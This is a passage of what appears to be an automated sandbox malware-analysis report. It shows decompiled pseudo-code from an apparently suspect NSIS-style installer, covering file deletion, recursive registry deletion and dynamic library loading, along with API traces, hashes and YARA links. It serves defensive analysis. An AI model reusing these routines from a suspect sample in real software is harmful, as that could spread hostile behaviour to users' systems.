				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f438;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403300(_t45);
						E004032EA(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C4B( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D37( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
Opcode Fuzzy Hash: e200f0a06a1b791de6fcd90df19bdd9ae0c902d0d002ce7977cb24af33c736ef
Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004049C4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E004049C4(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E0040618A(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E0040618A(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E0040618A(_t41, _t47, 0x42a890, 0x42a890, _a8);
				wsprintfA(_t32 + lstrlenA(0x42a890), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x42ebf8, _a4, 0x42a890);
			}

0x004049ca
0x004049cf
0x004049d7
0x004049d8
0x004049e5
0x004049ed
0x004049ee
0x004049f0
0x004049f2
0x004049f4
0x004049f7
0x004049f7
0x004049fe
0x00404a04
0x00404a04
0x00404a0b
0x00404a12
0x00404a15
0x00404a18
0x00404a18
0x00404a1c
0x00404a2c
0x00404a2e
0x00404a31
0x004049da
0x004049da
0x004049e1
0x004049e1
0x00404a39
0x00404a44
0x00404a5a
0x00404a6a
0x00404a86

APIs

lstrlenA.KERNEL32(Name Setup: Completed,Name Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
wsprintfA.USER32 ref: 00404A6A
SetDlgItemTextA.USER32 ref: 00404A7D

Strings

%u.%u%s%s, xrefs: 00404A4C
Name Setup: Completed, xrefs: 00404A54, 00404A59, 00404A5F, 00404A73

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Name Setup: Completed
API String ID: 3540041739-970259760
Opcode ID: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
Opcode Fuzzy Hash: 5f94da5c7593bdf0e2880c0754fbf5196b9ea6ae0f0d3d8572f030c1a72350cb
Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00405F7D(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406500(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}

0x00402cdb
0x00402ce4
0x00402ced
0x00402cf9
0x00402d02
0x00402d0c
0x00402d31
0x00402d37
0x00402d3c
0x00402d3d
0x00402d6d
0x00402d46
0x00402d48
0x00402d98
0x00402d9b
0x00000000
0x00402da1
0x00402d57
0x00402d5c
0x00402d5e
0x00000000
0x00000000
0x00402d66
0x00402d6b
0x00402d6c
0x00402d6c
0x00402d79
0x00402d81
0x00402d88
0x00000000
0x00402db1
0x00000000
0x00402d90
0x00402d1c
0x00402d2f
0x00000000
0x00000000
0x00000000
0x00402d2f
0x00402db7

APIs

RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75
windowCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x42f420,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}

0x00401d65
0x00401d69
0x00401d7e
0x00401d6b
0x00401d6d
0x00401d73
0x00401d73
0x00401d84
0x00401d87
0x00401d91
0x00401d94
0x00401d9c
0x00401dad
0x00401db0
0x00401dbb
0x00401db2
0x00401db4
0x00401db4
0x00401dbf
0x00401dcc
0x00401df3
0x00401e02
0x00401e10
0x00401e18
0x00401e20
0x00401e20
0x00401e29
0x00401e2f
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDlgItem.USER32 ref: 00401D7E
GetClientRect.USER32 ref: 00401DCC
LoadImageA.USER32 ref: 00401DFC
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E10
DeleteObject.GDI32(00000000), ref: 00401E20

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction ID: ea2313c62ec258575502bac7b5a91221d1b2f7c42d1e166e88532b570a834240
Opcode Fuzzy Hash: 64047181dbb11954f6248d6d4ebce6329301936260590e1bb013e11241bca830
Instruction Fuzzy Hash: 02212872A00109AFCB15DFA4DD85AAEBBB5EB48300F24417EF905F62A1DB389941DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b838->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b848 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b84f = 1;
				 *0x40b84c = _t15 & 0x00000001;
				 *0x40b84d = _t15 & 0x00000002;
				 *0x40b84e = _t15 & 0x00000004;
				E0040618A(_t9, _t31, _t33, 0x40b854,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b838);
				_push(_t18);
				_push(_t33);
				E00406055();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00401e35
0x00401e40
0x00401e42
0x00401e4f
0x00401e66
0x00401e6b
0x00401e78
0x00401e7d
0x00401e81
0x00401e8c
0x00401e93
0x00401ea5
0x00401eab
0x00401eb0
0x00401eba
0x00402620
0x00401569
0x004029a5
0x00402a5d
0x00402a69

APIs

GetDC.USER32(?), ref: 00401E38
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
ReleaseDC.USER32 ref: 00401E6B
CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 34521723c529513f9d2f25f2c915d7e6e1bbb21449fac5a346249fa94324e5da
Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
Opcode Fuzzy Hash: 34521723c529513f9d2f25f2c915d7e6e1bbb21449fac5a346249fa94324e5da
Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406055();
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c2e
0x00401c30
0x00401c37
0x00401c3a
0x00401c3d
0x00401c47
0x00401c4b
0x00401c4e
0x00401c57
0x00401c57
0x00401c5a
0x00401c5e
0x00401c67
0x00401c67
0x00401c6a
0x00401c6e
0x00401c70
0x00401cc5
0x00401cc7
0x00401cd0
0x00401cd8
0x00401cdb
0x00401cdb
0x00401ce4
0x00000000
0x00401c72
0x00401c79
0x00401c7b
0x00401c7e
0x00401c84
0x00401c8b
0x00401c8e
0x00401cb6
0x00401cea
0x00401cea
0x00401c90
0x00401c9e
0x00401ca6
0x00401ca9
0x00401ca9
0x00401c8e
0x00401ced
0x00401cf0
0x00401cf6
0x004029a5
0x004029a5
0x00402a5d
0x00402a69

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6

Strings

!, xrefs: 00401C6A

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405A8F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}

0x00405a90
0x00405aa7
0x00405aaf
0x00405aaf
0x00405ab7

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 0040521E: lstrlenA.KERNEL32(Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,Completed,00000000,00422E78,74B5EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
Part of subcall function 0040521E: lstrcatA.KERNEL32(Completed,00403233,00403233,Completed,00000000,00422E78,74B5EA30), ref: 0040527A
Part of subcall function 0040521E: SetWindowTextA.USER32(Completed,Completed), ref: 0040528C
Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.196180196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.196175521.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196186976.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.196191567.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196206921.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196210429.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196214797.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.196219262.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E

